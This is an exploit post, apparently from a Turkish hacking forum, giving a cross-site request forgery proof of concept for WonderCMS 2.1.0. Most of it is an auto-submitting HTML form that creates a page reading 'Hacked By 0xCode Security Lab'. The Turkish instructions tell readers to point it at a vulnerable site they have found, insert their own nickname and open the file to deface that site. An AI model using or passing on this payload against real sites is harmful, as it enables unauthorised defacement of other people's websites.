# Exploit Title: Cross-Site Request Forgery in WonderCMS
# Date: 2017-06-19
# Exploit Author: Zerox Security Lab
# Software Link: https://www.wondercms.com
# Version: 2.1.0
# Twitter: https://twitter.com/ZeroxSecLab
Siteleri bulmanızı sağlayacak bir dork üretilemedi, siz belki bulursunuz bir yolunu, wondercms 2.1.0 sürümünde CSRF ile post oluşturma açığı tespit edildi.
Kod:
<html>
<body>
<form action="http://localhost/wonder/" method="post">
<input name="fieldname" value="title">
<input name="content" value="Hacked By 0xCode Security Lab">
<input name="target" value="pages">
<input type="submit" value="ok">
</form>
</body>
</html>
<script>
docu ment.forms[0].submit(); // docu ment'teki boşluğu kapatınız
</script>Kullanılacak kod, tespit ettiğiniz siteyi localhost kısmına editliyosunuz "Hacked By 0xCode Security Lab" yazan yere de kendini nickinizi yazıyosunuz bu kodu txt dosyasına kaydetip uzantısını .html yapıp açıyosunuz submit'e tıklıyosunuz
Son düzenleme:
